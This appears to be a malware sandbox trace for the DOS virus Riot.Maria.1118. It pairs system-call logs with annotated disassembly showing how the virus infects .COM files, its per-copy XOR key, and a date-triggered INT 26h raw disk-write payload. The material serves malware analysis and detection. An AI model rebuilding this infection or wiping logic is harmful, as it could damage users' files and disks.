Sample viewer

vx.netlux.org/Virus.DOS.Riot.Maria.1118

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:01:38.133010085Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; resumes after INT 21h AH=2Ah (op 42 = 0x2A), which returns DL = day of month
0x12a5d: je 0x12a61  ; day == 2 -> raw disk-write path below
0x12a5f: jmp 0x12a7e  ; any other day -> ret, nothing written
0x12a61: cli
0x12a62: mov ah, 2
0x12a64: cdq  ; NOTE(review): one-byte opcode; in 16-bit code this would normally decode as CWD (DX = sign of AX, i.e. 0 with AH = 2) - confirm disassembler mode
0x12a65: mov cx, 0x100  ; sector count = 0x100 (256)
0x12a68: int 0x26  ; INT 26h = DOS absolute disk write (AL = drive, CX = sectors, DX = first sector, DS:BX = buffer): date-triggered destructive payload
; Triage note: the rows visible in this table are all INT 21h functions, so this INT 26h would presumably not be listed even when taken - confirm with the sandbox.
0x12a6a: jmp 0x12a6c
0x12a6c: cli
0x12a6d: mov al, 3  ; as an INT 26h drive number, 3 = D: (0 = A:)
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]  ; DS and BX reloaded from the words at [di+0x63] and [di+0x37]
0x12a7b: call 0x22a61  ; NOTE(review): target printed without 16-bit IP wraparound; presumably 0x12a61, i.e. back into the INT 26h sequence - confirm
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]  ; a separate routine starts after the ret: AL = byte at [SI]
0x12a80: xor al, ah  ; XOR with the key byte held in AH
0x12a82: stosb byte ptr es:[di], al  ; store to ES:[DI]; presumably the XOR en/decryption loop of the body, loop instruction is outside this window
2018-12-17T23:01:38.13646145Z 71 PC: 12b46 | Get current directory
2018-12-17T23:01:38.142205864Z 59 PC: 12b51 | Change current directory
2018-12-17T23:01:38.147185992Z 26 PC: 12c04 | Set disk transfer address
2018-12-17T23:01:38.148726527Z 78 PC: 12c12 | Find first file
2018-12-17T23:01:38.163038489Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:01:38.170899991Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-17T23:01:38.17855783Z 44 PC: 12c88 | Get time 0x12c88: add dl, dh  ; resumes after INT 21h AH=2Ch (op 44 = 0x2C): DH = seconds, DL = hundredths; DL += DH
0x12c8a: je 0x12c84  ; sum is zero -> back to 0x12c84 (before this window; presumably re-reads the clock)
0x12c8c: mov si, 0x115
0x12c8f: add si, word ptr [0x106]  ; SI = 0x115 + word at DS:0x106; presumably a per-host base offset - confirm
0x12c93: mov byte ptr [si], dl  ; stores the clock-derived byte; presumably the per-copy XOR key - confirm
0x12c95: mov ax, 0x4301  ; INT 21h AX=4301h: set file attributes
0x12c98: xor cx, cx  ; CX = 0 clears read-only/hidden/system so the target can be opened for writing
0x12c9a: mov dx, si
0x12c9c: add dx, 0xc7  ; DS:DX = path at SI + 0xc7
0x12ca0: int 0x21  ; traced below as op 67 at PC 12ca2
0x12ca2: mov ah, 0x3e  ; AH=3Eh: close the handle in BX
0x12ca4: int 0x21  ; traced below as op 62 at PC 12ca6
0x12ca6: mov ax, 0x3d02  ; AX=3D02h: open, access mode 2 = read/write
0x12ca9: int 0x21  ; traced below as op 61 at PC 12cab
0x12cab: jb 0x12c5e  ; CF set = open failed -> 0x12c5e (outside this window)
0x12cad: mov di, dx
0x12caf: add di, 0x63
0x12cb2: stosw word ptr es:[di], ax  ; saves the new handle (AX) at ES:[DX + 0x63]
0x12cb3: xchg ax, bx  ; BX = handle for the calls that follow
0x12cb4: mov ah, 0x40  ; AH=40h: write to file; the INT 21h itself is past the end of the window
; Behavioural signature for detection: clear attributes -> reopen read/write -> writes -> restore file date/time (op 87) and attributes (op 67), as the following rows show.
2018-12-17T23:01:38.182430707Z 67 PC: 12ca2 | Get or set file attributes
2018-12-17T23:01:38.202042558Z 62 PC: 12ca6 | Close file
2018-12-17T23:01:38.204451184Z 61 PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:01:38.211860256Z 64 PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:01:38.215872846Z 64 PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:01:38.218981507Z 64 PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:01:38.222015959Z 66 PC: 12cee | Move file pointer
2018-12-17T23:01:38.225019382Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; resumes after INT 21h AH=2Ah (op 42 = 0x2A), which returns DL = day of month
0x12a5d: je 0x12a61  ; day == 2 -> raw disk-write path below
0x12a5f: jmp 0x12a7e  ; any other day -> ret, nothing written
0x12a61: cli
0x12a62: mov ah, 2
0x12a64: cdq  ; NOTE(review): one-byte opcode; in 16-bit code this would normally decode as CWD (DX = sign of AX, i.e. 0 with AH = 2) - confirm disassembler mode
0x12a65: mov cx, 0x100  ; sector count = 0x100 (256)
0x12a68: int 0x26  ; INT 26h = DOS absolute disk write (AL = drive, CX = sectors, DX = first sector, DS:BX = buffer): date-triggered destructive payload
; Triage note: the rows visible in this table are all INT 21h functions, so this INT 26h would presumably not be listed even when taken - confirm with the sandbox.
0x12a6a: jmp 0x12a6c
0x12a6c: cli
0x12a6d: mov al, 3  ; as an INT 26h drive number, 3 = D: (0 = A:)
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]  ; DS and BX reloaded from the words at [di+0x63] and [di+0x37]
0x12a7b: call 0x22a61  ; NOTE(review): target printed without 16-bit IP wraparound; presumably 0x12a61, i.e. back into the INT 26h sequence - confirm
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]  ; a separate routine starts after the ret: AL = byte at [SI]
0x12a80: xor al, ah  ; XOR with the key byte held in AH
0x12a82: stosb byte ptr es:[di], al  ; store to ES:[DI]; presumably the XOR en/decryption loop of the body, loop instruction is outside this window
2018-12-17T23:01:38.227673088Z 64 PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-17T23:01:38.237815777Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; resumes after INT 21h AH=2Ah (op 42 = 0x2A), which returns DL = day of month
0x12a5d: je 0x12a61  ; day == 2 -> raw disk-write path below
0x12a5f: jmp 0x12a7e  ; any other day -> ret, nothing written
0x12a61: cli
0x12a62: mov ah, 2
0x12a64: cdq  ; NOTE(review): one-byte opcode; in 16-bit code this would normally decode as CWD (DX = sign of AX, i.e. 0 with AH = 2) - confirm disassembler mode
0x12a65: mov cx, 0x100  ; sector count = 0x100 (256)
0x12a68: int 0x26  ; INT 26h = DOS absolute disk write (AL = drive, CX = sectors, DX = first sector, DS:BX = buffer): date-triggered destructive payload
; Triage note: the rows visible in this table are all INT 21h functions, so this INT 26h would presumably not be listed even when taken - confirm with the sandbox.
0x12a6a: jmp 0x12a6c
0x12a6c: cli
0x12a6d: mov al, 3  ; as an INT 26h drive number, 3 = D: (0 = A:)
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]  ; DS and BX reloaded from the words at [di+0x63] and [di+0x37]
0x12a7b: call 0x22a61  ; NOTE(review): target printed without 16-bit IP wraparound; presumably 0x12a61, i.e. back into the INT 26h sequence - confirm
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]  ; a separate routine starts after the ret: AL = byte at [SI]
0x12a80: xor al, ah  ; XOR with the key byte held in AH
0x12a82: stosb byte ptr es:[di], al  ; store to ES:[DI]; presumably the XOR en/decryption loop of the body, loop instruction is outside this window
2018-12-17T23:01:38.241667925Z 87 PC: 12d07 | Get or set file date and time
2018-12-17T23:01:38.243380483Z 62 PC: 12d0b | Close file
2018-12-17T23:01:38.251960103Z 67 PC: 12d1c | Get or set file attributes
2018-12-17T23:01:38.263639709Z 79 PC: 12c25 | Find next file
2018-12-17T23:01:38.267456962Z 61 PC: 12c3d | Open file (Filename = 'PRINT.COM')
2018-12-17T23:01:38.27529524Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-17T23:01:38.282759015Z 44 PC: 12c88 | Get time 0x12c88: add dl, dh  ; resumes after INT 21h AH=2Ch (op 44 = 0x2C): DH = seconds, DL = hundredths; DL += DH
0x12c8a: je 0x12c84  ; sum is zero -> back to 0x12c84 (before this window; presumably re-reads the clock)
0x12c8c: mov si, 0x115
0x12c8f: add si, word ptr [0x106]  ; SI = 0x115 + word at DS:0x106; presumably a per-host base offset - confirm
0x12c93: mov byte ptr [si], dl  ; stores the clock-derived byte; presumably the per-copy XOR key - confirm
0x12c95: mov ax, 0x4301  ; INT 21h AX=4301h: set file attributes
0x12c98: xor cx, cx  ; CX = 0 clears read-only/hidden/system so the target can be opened for writing
0x12c9a: mov dx, si
0x12c9c: add dx, 0xc7  ; DS:DX = path at SI + 0xc7
0x12ca0: int 0x21  ; traced below as op 67 at PC 12ca2
0x12ca2: mov ah, 0x3e  ; AH=3Eh: close the handle in BX
0x12ca4: int 0x21  ; traced below as op 62 at PC 12ca6
0x12ca6: mov ax, 0x3d02  ; AX=3D02h: open, access mode 2 = read/write
0x12ca9: int 0x21  ; traced below as op 61 at PC 12cab
0x12cab: jb 0x12c5e  ; CF set = open failed -> 0x12c5e (outside this window)
0x12cad: mov di, dx
0x12caf: add di, 0x63
0x12cb2: stosw word ptr es:[di], ax  ; saves the new handle (AX) at ES:[DX + 0x63]
0x12cb3: xchg ax, bx  ; BX = handle for the calls that follow
0x12cb4: mov ah, 0x40  ; AH=40h: write to file; the INT 21h itself is past the end of the window
; Behavioural signature for detection: clear attributes -> reopen read/write -> writes -> restore file date/time (op 87) and attributes (op 67), as the following rows show.
2018-12-17T23:01:38.286254323Z 67 PC: 12ca2 | Get or set file attributes
2018-12-17T23:01:38.297314274Z 62 PC: 12ca6 | Close file
2018-12-17T23:01:38.299466649Z 61 PC: 12cab | Open file (Filename = 'PRINT.COM')
2018-12-17T23:01:38.308624957Z 64 PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:01:38.311811595Z 64 PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:01:38.314754214Z 64 PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:01:38.318576486Z 66 PC: 12cee | Move file pointer
2018-12-17T23:01:38.320657837Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; resumes after INT 21h AH=2Ah (op 42 = 0x2A), which returns DL = day of month
0x12a5d: je 0x12a61  ; day == 2 -> raw disk-write path below
0x12a5f: jmp 0x12a7e  ; any other day -> ret, nothing written
0x12a61: cli
0x12a62: mov ah, 2
0x12a64: cdq  ; NOTE(review): one-byte opcode; in 16-bit code this would normally decode as CWD (DX = sign of AX, i.e. 0 with AH = 2) - confirm disassembler mode
0x12a65: mov cx, 0x100  ; sector count = 0x100 (256)
0x12a68: int 0x26  ; INT 26h = DOS absolute disk write (AL = drive, CX = sectors, DX = first sector, DS:BX = buffer): date-triggered destructive payload
; Triage note: the rows visible in this table are all INT 21h functions, so this INT 26h would presumably not be listed even when taken - confirm with the sandbox.
0x12a6a: jmp 0x12a6c
0x12a6c: cli
0x12a6d: mov al, 3  ; as an INT 26h drive number, 3 = D: (0 = A:)
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]  ; DS and BX reloaded from the words at [di+0x63] and [di+0x37]
0x12a7b: call 0x22a61  ; NOTE(review): target printed without 16-bit IP wraparound; presumably 0x12a61, i.e. back into the INT 26h sequence - confirm
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]  ; a separate routine starts after the ret: AL = byte at [SI]
0x12a80: xor al, ah  ; XOR with the key byte held in AH
0x12a82: stosb byte ptr es:[di], al  ; store to ES:[DI]; presumably the XOR en/decryption loop of the body, loop instruction is outside this window
2018-12-17T23:01:38.323512101Z 64 PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-17T23:01:38.333851098Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; resumes after INT 21h AH=2Ah (op 42 = 0x2A), which returns DL = day of month
0x12a5d: je 0x12a61  ; day == 2 -> raw disk-write path below
0x12a5f: jmp 0x12a7e  ; any other day -> ret, nothing written
0x12a61: cli
0x12a62: mov ah, 2
0x12a64: cdq  ; NOTE(review): one-byte opcode; in 16-bit code this would normally decode as CWD (DX = sign of AX, i.e. 0 with AH = 2) - confirm disassembler mode
0x12a65: mov cx, 0x100  ; sector count = 0x100 (256)
0x12a68: int 0x26  ; INT 26h = DOS absolute disk write (AL = drive, CX = sectors, DX = first sector, DS:BX = buffer): date-triggered destructive payload
; Triage note: the rows visible in this table are all INT 21h functions, so this INT 26h would presumably not be listed even when taken - confirm with the sandbox.
0x12a6a: jmp 0x12a6c
0x12a6c: cli
0x12a6d: mov al, 3  ; as an INT 26h drive number, 3 = D: (0 = A:)
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]  ; DS and BX reloaded from the words at [di+0x63] and [di+0x37]
0x12a7b: call 0x22a61  ; NOTE(review): target printed without 16-bit IP wraparound; presumably 0x12a61, i.e. back into the INT 26h sequence - confirm
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]  ; a separate routine starts after the ret: AL = byte at [SI]
0x12a80: xor al, ah  ; XOR with the key byte held in AH
0x12a82: stosb byte ptr es:[di], al  ; store to ES:[DI]; presumably the XOR en/decryption loop of the body, loop instruction is outside this window
2018-12-17T23:01:38.336644947Z 87 PC: 12d07 | Get or set file date and time
2018-12-17T23:01:38.338790349Z 62 PC: 12d0b | Close file
2018-12-17T23:01:38.349103948Z 67 PC: 12d1c | Get or set file attributes
2018-12-17T23:01:38.362376137Z 79 PC: 12c25 | Find next file
2018-12-17T23:01:38.365797796Z 61 PC: 12c3d | Open file (Filename = 'HELLO.COM')
2018-12-17T23:01:38.373954513Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-17T23:01:38.381353045Z 44 PC: 12c88 | Get time 0x12c88: add dl, dh  ; resumes after INT 21h AH=2Ch (op 44 = 0x2C): DH = seconds, DL = hundredths; DL += DH
0x12c8a: je 0x12c84  ; sum is zero -> back to 0x12c84 (before this window; presumably re-reads the clock)
0x12c8c: mov si, 0x115
0x12c8f: add si, word ptr [0x106]  ; SI = 0x115 + word at DS:0x106; presumably a per-host base offset - confirm
0x12c93: mov byte ptr [si], dl  ; stores the clock-derived byte; presumably the per-copy XOR key - confirm
0x12c95: mov ax, 0x4301  ; INT 21h AX=4301h: set file attributes
0x12c98: xor cx, cx  ; CX = 0 clears read-only/hidden/system so the target can be opened for writing
0x12c9a: mov dx, si
0x12c9c: add dx, 0xc7  ; DS:DX = path at SI + 0xc7
0x12ca0: int 0x21  ; traced below as op 67 at PC 12ca2
0x12ca2: mov ah, 0x3e  ; AH=3Eh: close the handle in BX
0x12ca4: int 0x21  ; traced below as op 62 at PC 12ca6
0x12ca6: mov ax, 0x3d02  ; AX=3D02h: open, access mode 2 = read/write
0x12ca9: int 0x21  ; traced below as op 61 at PC 12cab
0x12cab: jb 0x12c5e  ; CF set = open failed -> 0x12c5e (outside this window)
0x12cad: mov di, dx
0x12caf: add di, 0x63
0x12cb2: stosw word ptr es:[di], ax  ; saves the new handle (AX) at ES:[DX + 0x63]
0x12cb3: xchg ax, bx  ; BX = handle for the calls that follow
0x12cb4: mov ah, 0x40  ; AH=40h: write to file; the INT 21h itself is past the end of the window
; Behavioural signature for detection: clear attributes -> reopen read/write -> writes -> restore file date/time (op 87) and attributes (op 67), as the following rows show.
2018-12-17T23:01:38.383681149Z 67 PC: 12ca2 | Get or set file attributes
2018-12-17T23:01:38.394178733Z 62 PC: 12ca6 | Close file
2018-12-17T23:01:38.397118377Z 61 PC: 12cab | Open file (Filename = 'HELLO.COM')
2018-12-17T23:01:38.404254536Z 64 PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:01:38.407616663Z 64 PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:01:38.411475534Z 64 PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:01:38.414370614Z 66 PC: 12cee | Move file pointer
2018-12-17T23:01:38.416437498Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; resumes after INT 21h AH=2Ah (op 42 = 0x2A), which returns DL = day of month
0x12a5d: je 0x12a61  ; day == 2 -> raw disk-write path below
0x12a5f: jmp 0x12a7e  ; any other day -> ret, nothing written
0x12a61: cli
0x12a62: mov ah, 2
0x12a64: cdq  ; NOTE(review): one-byte opcode; in 16-bit code this would normally decode as CWD (DX = sign of AX, i.e. 0 with AH = 2) - confirm disassembler mode
0x12a65: mov cx, 0x100  ; sector count = 0x100 (256)
0x12a68: int 0x26  ; INT 26h = DOS absolute disk write (AL = drive, CX = sectors, DX = first sector, DS:BX = buffer): date-triggered destructive payload
; Triage note: the rows visible in this table are all INT 21h functions, so this INT 26h would presumably not be listed even when taken - confirm with the sandbox.
0x12a6a: jmp 0x12a6c
0x12a6c: cli
0x12a6d: mov al, 3  ; as an INT 26h drive number, 3 = D: (0 = A:)
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]  ; DS and BX reloaded from the words at [di+0x63] and [di+0x37]
0x12a7b: call 0x22a61  ; NOTE(review): target printed without 16-bit IP wraparound; presumably 0x12a61, i.e. back into the INT 26h sequence - confirm
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]  ; a separate routine starts after the ret: AL = byte at [SI]
0x12a80: xor al, ah  ; XOR with the key byte held in AH
0x12a82: stosb byte ptr es:[di], al  ; store to ES:[DI]; presumably the XOR en/decryption loop of the body, loop instruction is outside this window
2018-12-17T23:01:38.42008422Z 64 PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-17T23:01:38.430153841Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; resumes after INT 21h AH=2Ah (op 42 = 0x2A), which returns DL = day of month
0x12a5d: je 0x12a61  ; day == 2 -> raw disk-write path below
0x12a5f: jmp 0x12a7e  ; any other day -> ret, nothing written
0x12a61: cli
0x12a62: mov ah, 2
0x12a64: cdq  ; NOTE(review): one-byte opcode; in 16-bit code this would normally decode as CWD (DX = sign of AX, i.e. 0 with AH = 2) - confirm disassembler mode
0x12a65: mov cx, 0x100  ; sector count = 0x100 (256)
0x12a68: int 0x26  ; INT 26h = DOS absolute disk write (AL = drive, CX = sectors, DX = first sector, DS:BX = buffer): date-triggered destructive payload
; Triage note: the rows visible in this table are all INT 21h functions, so this INT 26h would presumably not be listed even when taken - confirm with the sandbox.
0x12a6a: jmp 0x12a6c
0x12a6c: cli
0x12a6d: mov al, 3  ; as an INT 26h drive number, 3 = D: (0 = A:)
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]  ; DS and BX reloaded from the words at [di+0x63] and [di+0x37]
0x12a7b: call 0x22a61  ; NOTE(review): target printed without 16-bit IP wraparound; presumably 0x12a61, i.e. back into the INT 26h sequence - confirm
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]  ; a separate routine starts after the ret: AL = byte at [SI]
0x12a80: xor al, ah  ; XOR with the key byte held in AH
0x12a82: stosb byte ptr es:[di], al  ; store to ES:[DI]; presumably the XOR en/decryption loop of the body, loop instruction is outside this window
2018-12-17T23:01:38.433201638Z 87 PC: 12d07 | Get or set file date and time
2018-12-17T23:01:38.436391021Z 62 PC: 12d0b | Close file
2018-12-17T23:01:38.445523481Z 67 PC: 12d1c | Get or set file attributes
2018-12-17T23:01:38.457897181Z 42 PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606  ; resumes after INT 21h AH=2Ah: DH = month, DL = day, so 0x0606 = 6 June
0x12b70: je 0x12b75  ; date matches -> 0x12b75
0x12b72: jmp 0x12d8c  ; otherwise -> 0x12d8c (outside this window); the next traced calls are the chdir at 12d97/12d9e
0x12b75: jmp 0x12d21  ; 6 June branch; code at 0x12d21 is not shown, presumably a date-triggered payload - confirm
0x12b78: and ah, bh  ; NOTE(review): 0x12b78-0x12b83 sits behind two unconditional jumps; likely data or a misaligned decode
0x12b7a: movsw word ptr es:[di], word ptr [si]
0x12b7b: mov ax, 0x5c4c
0x12b7e: add word ptr [di], ax
0x12b80: add byte ptr [di - 0x75], dl  ; encodes as 00 55 8B; with the next byte (EC) that contains 55 8B EC = push bp / mov bp, sp
0x12b83: in al, dx  ; so the real routine presumably starts at 0x12b81 - confirm against the raw bytes
0x12b84: sub sp, 0x2c  ; reserves 0x2c bytes of stack locals
0x12b87: push si
0x12b88: jmp 0x12bf9
0x12b8a: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b8c: lea dx, word ptr [bp - 0x2c]  ; DTA = the stack buffer reserved above
0x12b8f: int 0x21
0x12b91: mov ah, 0x4e  ; AH=4Eh: find first
0x12b93: mov cx, 0x10  ; attribute mask 0x10 = directory
0x12b96: mov dx, 0x1b5
0x12b99: add dx, word ptr [0x106]  ; DS:DX = search spec at 0x1b5 + word at DS:0x106; the INT 21h is past the end of the window
2018-12-17T23:01:38.460772694Z 59 PC: 12d97 | Change current directory
2018-12-17T23:01:38.466642614Z 59 PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":13945,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:31.895712086Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; resumes after INT 21h AH=2Ah (op 42 = 0x2A), which returns DL = day of month
0x12a5d: je 0x12a61  ; day == 2 -> raw disk-write path below
0x12a5f: jmp 0x12a7e  ; any other day -> ret, nothing written
0x12a61: cli
0x12a62: mov ah, 2
0x12a64: cdq  ; NOTE(review): one-byte opcode; in 16-bit code this would normally decode as CWD (DX = sign of AX, i.e. 0 with AH = 2) - confirm disassembler mode
0x12a65: mov cx, 0x100  ; sector count = 0x100 (256)
0x12a68: int 0x26  ; INT 26h = DOS absolute disk write (AL = drive, CX = sectors, DX = first sector, DS:BX = buffer): date-triggered destructive payload
; Triage note: the rows visible in this table are all INT 21h functions, so this INT 26h would presumably not be listed even when taken - confirm with the sandbox.
0x12a6a: jmp 0x12a6c
0x12a6c: cli
0x12a6d: mov al, 3  ; as an INT 26h drive number, 3 = D: (0 = A:)
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]  ; DS and BX reloaded from the words at [di+0x63] and [di+0x37]
0x12a7b: call 0x22a61  ; NOTE(review): target printed without 16-bit IP wraparound; presumably 0x12a61, i.e. back into the INT 26h sequence - confirm
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]  ; a separate routine starts after the ret: AL = byte at [SI]
0x12a80: xor al, ah  ; XOR with the key byte held in AH
0x12a82: stosb byte ptr es:[di], al  ; store to ES:[DI]; presumably the XOR en/decryption loop of the body, loop instruction is outside this window
2018-12-25T12:39:31.898319736Z 71 PC: 12b46 | Get current directory
2018-12-25T12:39:31.900944992Z 59 PC: 12b51 | Change current directory
2018-12-25T12:39:31.904617375Z 26 PC: 12c04 | Set disk transfer address
2018-12-25T12:39:31.906005021Z 78 PC: 12c12 | Find first file
2018-12-25T12:39:31.911620604Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:31.917619153Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:31.923852892Z 44 PC: 12c88 | Get time 0x12c88: add dl, dh  ; resumes after INT 21h AH=2Ch (op 44 = 0x2C): DH = seconds, DL = hundredths; DL += DH
0x12c8a: je 0x12c84  ; sum is zero -> back to 0x12c84 (before this window; presumably re-reads the clock)
0x12c8c: mov si, 0x115
0x12c8f: add si, word ptr [0x106]  ; SI = 0x115 + word at DS:0x106; presumably a per-host base offset - confirm
0x12c93: mov byte ptr [si], dl  ; stores the clock-derived byte; presumably the per-copy XOR key - confirm
0x12c95: mov ax, 0x4301  ; INT 21h AX=4301h: set file attributes
0x12c98: xor cx, cx  ; CX = 0 clears read-only/hidden/system so the target can be opened for writing
0x12c9a: mov dx, si
0x12c9c: add dx, 0xc7  ; DS:DX = path at SI + 0xc7
0x12ca0: int 0x21  ; traced below as op 67 at PC 12ca2
0x12ca2: mov ah, 0x3e  ; AH=3Eh: close the handle in BX
0x12ca4: int 0x21  ; traced below as op 62 at PC 12ca6
0x12ca6: mov ax, 0x3d02  ; AX=3D02h: open, access mode 2 = read/write
0x12ca9: int 0x21  ; traced below as op 61 at PC 12cab
0x12cab: jb 0x12c5e  ; CF set = open failed -> 0x12c5e (outside this window)
0x12cad: mov di, dx
0x12caf: add di, 0x63
0x12cb2: stosw word ptr es:[di], ax  ; saves the new handle (AX) at ES:[DX + 0x63]
0x12cb3: xchg ax, bx  ; BX = handle for the calls that follow
0x12cb4: mov ah, 0x40  ; AH=40h: write to file; the INT 21h itself is past the end of the window
; Behavioural signature for detection: clear attributes -> reopen read/write -> writes -> restore file date/time (op 87) and attributes (op 67), as the following rows show.
2018-12-25T12:39:31.925736916Z 67 PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:33.364630904Z 62 PC: 12ca6 | Close file
2018-12-25T12:39:33.367609218Z 61 PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:33.374012212Z 64 PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:33.38074069Z 64 PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.38327124Z 64 PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.386314562Z 66 PC: 12cee | Move file pointer
2018-12-25T12:39:33.388162404Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.390693094Z 64 PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:33.417152066Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.419242507Z 87 PC: 12d07 | Get or set file date and time
2018-12-25T12:39:33.420583126Z 62 PC: 12d0b | Close file
2018-12-25T12:39:33.460086868Z 67 PC: 12d1c | Get or set file attributes
2018-12-25T12:39:33.478069331Z 79 PC: 12c25 | Find next file
2018-12-25T12:39:33.482049916Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:33.498393395Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:33.504917867Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:33.507103219Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:33.522661497Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:33.524692834Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:33.531155759Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:33.534200186Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:33.536742008Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:33.539389557Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:33.541553126Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.54371176Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:33.560285826Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.56242571Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:33.564028938Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:33.583406977Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:33.599127662Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:39:33.624094409Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:33.630362979Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:33.6366856Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:33.639126478Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:33.669571305Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:33.671460179Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:33.678550617Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:33.681211207Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:33.683839011Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:33.686579546Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:33.688362355Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.690493273Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:33.719603286Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.721663699Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:33.723501423Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:33.770730546Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:33.81605472Z 42 PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606  ; resumes after INT 21h AH=2Ah: DH = month, DL = day, so 0x0606 = 6 June
